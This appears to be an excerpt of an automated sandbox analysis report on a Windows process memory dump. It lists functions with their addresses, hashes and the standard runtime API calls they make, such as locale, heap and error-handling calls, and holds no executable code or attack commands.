                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: gfffffff
                                                                      • API String ID: 3215553584-1523873471
                                                                      • Opcode ID: 98d554043dd905acf2618a7e06c910ecbfd187c0ac7b23f75298e314a72bc957
                                                                      • Instruction ID: b2117edbd6cf63959c0717958cbdcd750ca4e832081e788ce38582ce529fd7b1
                                                                      • Opcode Fuzzy Hash: 98d554043dd905acf2618a7e06c910ecbfd187c0ac7b23f75298e314a72bc957
                                                                      • Instruction Fuzzy Hash: AD915866B09FC586EB99CB29D4A03BD7795AB96FA4F058032CB4D87391DE3ED502C300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61489F908, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 207COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF61489F939
                                                                        • Part of subcall function 00007FF6148956A0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF61489564D), ref: 00007FF6148956A9
                                                                        • Part of subcall function 00007FF6148956A0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF61489564D), ref: 00007FF6148956CE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                      • String ID: -
                                                                      • API String ID: 4036615347-2547889144
                                                                      • Opcode ID: 6440065008994b68cc27b2938fc29d78b4b09fb93bf16ac7cee0ce8a3687bb3a
                                                                      • Instruction ID: 409a449a6e8a5c57ca320df4cdb678e22e6793324b6ff36bc0d5bce711214ea0
                                                                      • Opcode Fuzzy Hash: 6440065008994b68cc27b2938fc29d78b4b09fb93bf16ac7cee0ce8a3687bb3a
                                                                      • Instruction Fuzzy Hash: 0881D532A0CF8546E6A88A15D4A077AB691EBD6FF4F544235EB9D83BD9DF3DD4008700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A03B0, Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ExceptionRaise_clrfp
                                                                      • String ID:
                                                                      • API String ID: 15204871-0
                                                                      • Opcode ID: 98b1eef9f340e78824bb6b8c9f3fb1efcec8d0684a0669a3faa0a69f225b95a1
                                                                      • Instruction ID: afe15f254b877b712a3f1176a2251e425e343d12a9e12d1ac2d196bf0af1159b
                                                                      • Opcode Fuzzy Hash: 98b1eef9f340e78824bb6b8c9f3fb1efcec8d0684a0669a3faa0a69f225b95a1
                                                                      • Instruction Fuzzy Hash: 3EB12AB3601B448BEB55CF29C48636837A0FB86F58F298921DA5D977B4CF79D452C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614897950, Relevance: 1.9, APIs: 1, Instructions: 371COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID:
                                                                      • API String ID: 1807457897-0
                                                                      • Opcode ID: 80c80d56a55716f6762c1d4f443642eca71f69253dad8213487102c05e1b5ee1
                                                                      • Instruction ID: 06f2c51785d55b76c37d1a4543f51634dd9011d711e17c21db3825943567dc51
                                                                      • Opcode Fuzzy Hash: 80c80d56a55716f6762c1d4f443642eca71f69253dad8213487102c05e1b5ee1
                                                                      • Instruction Fuzzy Hash: 8D127022A08FC186E791DF28D4452F977A4FB99B58F059235EB9C83692EF39E584C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A74FC, Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6200d065c0e338f8d36cbf632f853d6eaca02771e835ea6f0ddf062978f05d41
                                                                      • Instruction ID: 3246278f0a526b6ab69ad8dc4f7d86833a5ec7b501af8a66804690da1eacdec6
                                                                      • Opcode Fuzzy Hash: 6200d065c0e338f8d36cbf632f853d6eaca02771e835ea6f0ddf062978f05d41
                                                                      • Instruction Fuzzy Hash: 8AE19F32A04F8185EB90DB61E4806FE27A4FB96B94F414636DF9D93796EF78D244D300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A96F0, Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF61489ED60: GetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489ED6F
                                                                        • Part of subcall function 00007FF61489ED60: SetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489EE0D
                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF6148A9758
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorLast$InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 3736152602-0
                                                                      • Opcode ID: f19ed28c9a06443b4f76f003892c82d45a61231e97e2f1f0f8a4cb9cf495e8bb
                                                                      • Instruction ID: ba6ac99d7c30f0451354946c1c543f1328e077d47b060f0b39d561c0234a147d
                                                                      • Opcode Fuzzy Hash: f19ed28c9a06443b4f76f003892c82d45a61231e97e2f1f0f8a4cb9cf495e8bb
                                                                      • Instruction Fuzzy Hash: EB316F36A0CA8686EBA48F25E4813BA72A0EF86F94F548535DB5DC32E5DF6CE4418740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A933C, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF61489ED60: GetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489ED6F
                                                                        • Part of subcall function 00007FF61489ED60: SetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489EE0D
                                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6148A9B27,?,00000000,00000092,?,?,00000000,?,00007FF61489C40D), ref: 00007FF6148A93DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2417226690-0
                                                                      • Opcode ID: 54a656723d1c0daefe16de6bc7041392403fb25f7d9d32fd38c7db26daa6b155
                                                                      • Instruction ID: dbfe3b1847231435048f9c78bef6102efc02cee3d3bd2a24cd648f105f0da0f2
                                                                      • Opcode Fuzzy Hash: 54a656723d1c0daefe16de6bc7041392403fb25f7d9d32fd38c7db26daa6b155
                                                                      • Instruction Fuzzy Hash: EC11D26BA0CA458AEB548F19D0C06BD7BB0EF81FB0F64A135D629833E4CEA8D5D1C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A98F8, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF61489ED60: GetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489ED6F
                                                                        • Part of subcall function 00007FF61489ED60: SetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489EE0D
                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,00007FF6148A96A1), ref: 00007FF6148A992F
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorLast$InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 3736152602-0
                                                                      • Opcode ID: a637af331ea1ba783b8140a8efee19a7960234949eb552f2b17a6b63f98dc3e7
                                                                      • Instruction ID: 789a74cd4a5ba5f8ccb807c99f5f5cc16fbf5eb4e5359deb3b8d8657e2ef21cb
                                                                      • Opcode Fuzzy Hash: a637af331ea1ba783b8140a8efee19a7960234949eb552f2b17a6b63f98dc3e7
                                                                      • Instruction Fuzzy Hash: 10113A36A1CD5292E7F5CB12D0807B96260EF42F74F285A35EB6D876E8CE79D8818740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A940C, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF61489ED60: GetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489ED6F
                                                                        • Part of subcall function 00007FF61489ED60: SetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489EE0D
                                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6148A9AE3,?,00000000,00000092,?,?,00000000,?,00007FF61489C40D), ref: 00007FF6148A948A
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2417226690-0
                                                                      • Opcode ID: d51073a5d97c2ee87901268ef6e4b1dc081ba8eb3901c9bb52f83f9b5441274e
                                                                      • Instruction ID: f73cfde476f2b0ac1610918f22d17e53c88794a5e665f34eebda8415db64e206
                                                                      • Opcode Fuzzy Hash: d51073a5d97c2ee87901268ef6e4b1dc081ba8eb3901c9bb52f83f9b5441274e
                                                                      • Instruction Fuzzy Hash: 1E01F576E0CA8686E7904F15E4C0BB97691EF41FB4F648632D269836E4CFA8D880C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A0A8C, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF6148A0E91,?,?,?,?,?,?,?,?,00000000,00007FF6148A8988), ref: 00007FF6148A0ADB
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2099609381-0
                                                                      • Opcode ID: 6ad7c0013ea37637a295c6825eb927a33f3e23a9c6e7ef8ab318e9fae9b3b9f4
                                                                      • Instruction ID: 874e4025f454a4c2885a240a0adfcceb90eaec1588a1c79f2b482e1a8d5e0060
                                                                      • Opcode Fuzzy Hash: 6ad7c0013ea37637a295c6825eb927a33f3e23a9c6e7ef8ab318e9fae9b3b9f4
                                                                      • Instruction Fuzzy Hash: 21F01972A09E4182E784DB25E8901EA23A1EB9ABE0F548135DA5DD3765DF3CD5518700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614894830, Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: 0
                                                                      • API String ID: 3215553584-4108050209
                                                                      • Opcode ID: c5fbf6cbf01be343a6e5b9647b6ef2f4414ee8b6868a977b6d285d6eabe8a5d9
                                                                      • Instruction ID: 1fa5f584d38e26a973abd0d15142026c625c7e4d75c8110a504087f418ab81af
                                                                      • Opcode Fuzzy Hash: c5fbf6cbf01be343a6e5b9647b6ef2f4414ee8b6868a977b6d285d6eabe8a5d9
                                                                      • Instruction Fuzzy Hash: E461E711A0CE4246FAF9CA2DD0803BA57D19FC3F68F441139DD89977AACE2FE8469741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A48D8, Relevance: 1.4, APIs: 1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 00007FF6148A497D
                                                                        • Part of subcall function 00007FF61489E56C: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF61489EF39,?,?,0000E117BC86E4D3,00007FF6148957A9,?,?,?,?,00007FF6148A507E,?,?,00000000), ref: 00007FF61489E5C1
                                                                        • Part of subcall function 00007FF61489E5E4: HeapFree.KERNEL32(?,?,00007FF61489D60F,00007FF6148A7DC0,?,?,?,00007FF6148A8143,?,?,0000E117BC86E4D3,00007FF6148A8688,?,?,?,00007FF6148A85BB), ref: 00007FF61489E5FA
                                                                        • Part of subcall function 00007FF61489E5E4: GetLastError.KERNEL32(?,?,00007FF61489D60F,00007FF6148A7DC0,?,?,?,00007FF6148A8143,?,?,0000E117BC86E4D3,00007FF6148A8688,?,?,?,00007FF6148A85BB), ref: 00007FF61489E60C
                                                                        • Part of subcall function 00007FF6148AB76C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6148AB79A
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3806578645-0
                                                                      • Opcode ID: a9687b8fbf3c2df3c9b983c42e648fea4563e90f3d103a70a6894d5b62e4d472
                                                                      • Instruction ID: 994b0fbcf5ad4070899331287e5a0a1a188d883516fce0fcec05a307c8ac0af4
                                                                      • Opcode Fuzzy Hash: a9687b8fbf3c2df3c9b983c42e648fea4563e90f3d103a70a6894d5b62e4d472
                                                                      • Instruction Fuzzy Hash: 5941E821B09E4342FEE1DE1A649177AA680BF87FA0F644135EE4DC77E5EE7CE5018600
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A9D3C, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      • Opcode ID: b58a01c3eaf95072861ef5bcb5425f0a8d156f049cdaa0e6965f9f5ebbbf4e57
                                                                      • Instruction ID: 0cbfe2291912108332525fdb8bef544920f87adfc1e73f85d58edb80de9de486
                                                                      • Opcode Fuzzy Hash: b58a01c3eaf95072861ef5bcb5425f0a8d156f049cdaa0e6965f9f5ebbbf4e57
                                                                      • Instruction Fuzzy Hash: 4DB09234E07F02C2EA896B116CC625822A57F89B20FA44039C20CC2360DE2C60E64720
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614898549, Relevance: .5, Instructions: 535COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5553e3581ede3cd1b10b1cabc268ded416cfed56c3084098db9f77835179c864
                                                                      • Instruction ID: b75ffcca0d58025ab6053a03627fe7db43b6fc49924021aa5b0508391b57a9a9
                                                                      • Opcode Fuzzy Hash: 5553e3581ede3cd1b10b1cabc268ded416cfed56c3084098db9f77835179c864
                                                                      • Instruction Fuzzy Hash: 6F423C21D29E568DE2E38B35A8955366728BF53BE0F41C337EC0EB7665DF2DE4428600
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61489C25C, Relevance: .3, Instructions: 307COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorLastNameTranslatetry_get_function$CodePageValid_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3827717455-0
                                                                      • Opcode ID: 9208ab3a8c0750dcd223613ebaccc8e7d7835f1e4260380340b09507b72bd65c
                                                                      • Instruction ID: 647f372c80ab6776a81ce2e36f24e0ac20efe113c6858c4b5e7a9021606f6c9f
                                                                      • Opcode Fuzzy Hash: 9208ab3a8c0750dcd223613ebaccc8e7d7835f1e4260380340b09507b72bd65c
                                                                      • Instruction Fuzzy Hash: EFC1C426A08E8285EBE09B61D8903BA67A0FBD6FA8F405035DE4DC76D9DF3ED545C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A8A4C, Relevance: .3, Instructions: 272COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorLast$CurrentFeatureInfoLocalePresentProcessProcessortry_get_function
                                                                      • String ID:
                                                                      • API String ID: 959782435-0
                                                                      • Opcode ID: 5203609aa4bad29ed3e77321071a6e29ab0ed9482c732223ee7966cf5500c27a
                                                                      • Instruction ID: 8efb1c46667886e9b18b9f108943d4f3735d8a1d81599196366bc6e4b3a0447e
                                                                      • Opcode Fuzzy Hash: 5203609aa4bad29ed3e77321071a6e29ab0ed9482c732223ee7966cf5500c27a
                                                                      • Instruction Fuzzy Hash: 79B1F572A28E4682EBE49F21D4816B933A1FF91FA8F204131DA49C36D9DFBCE545C750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61489D558, Relevance: .1, Instructions: 126COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 485612231-0
                                                                      • Opcode ID: 2e11037db0977f4f005a61b76b88ce4246510ff31c1dda84676166b2e04852ae
                                                                      • Instruction ID: c08528a3dd9cc4b406074ecb67c505feb7ca3e71f50707d6f288a5d8467b1cac
                                                                      • Opcode Fuzzy Hash: 2e11037db0977f4f005a61b76b88ce4246510ff31c1dda84676166b2e04852ae
                                                                      • Instruction Fuzzy Hash: 5741D332725E5482EF84CF2AD9941A973A1FB89FE4B099136EE0DC7B58DE3DD5428304
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A5140, Relevance: .0, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9bbf4866a357c91611f18bb3e57e28d24af8732f5dd86d7352e5581cc33c1978
                                                                      • Instruction ID: 56fb6413f61b3ba6a01a2c4f940b2b001637e8b5b3300978682ebaed7a4ca63e
                                                                      • Opcode Fuzzy Hash: 9bbf4866a357c91611f18bb3e57e28d24af8732f5dd86d7352e5581cc33c1978
                                                                      • Instruction Fuzzy Hash: B3F068717186658FDBD48F2CA4826697BD0E748794F50C139D68DC3B14DE3CD0518F14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61488E37C, Relevance: .0, Instructions: 2COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2c98899bf0b4cc2eff70223c8b4096042381509e14587035cd5d17786f15a567
                                                                      • Instruction ID: 1a4a300af6f76f5a163b7d73df93d7aa65499dfb0b1ffa73ca14e5f680fc53bf
                                                                      • Opcode Fuzzy Hash: 2c98899bf0b4cc2eff70223c8b4096042381509e14587035cd5d17786f15a567
                                                                      • Instruction Fuzzy Hash: 64A00121908C13A0E6949B04A8A047122A0AB62B20B614031C21DD30E0AFACE8449301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A1340, Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A135B
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A137A
                                                                        • Part of subcall function 00007FF6148A0B08: GetProcAddress.KERNEL32(?,?,00000002,00007FF6148A0FAA,?,?,0000E117BC86E4D3,00007FF61489EF26,?,?,0000E117BC86E4D3,00007FF6148957A9), ref: 00007FF6148A0C60
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A1399
                                                                        • Part of subcall function 00007FF6148A0B08: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF6148A0FAA,?,?,0000E117BC86E4D3,00007FF61489EF26,?,?,0000E117BC86E4D3,00007FF6148957A9), ref: 00007FF6148A0BAB
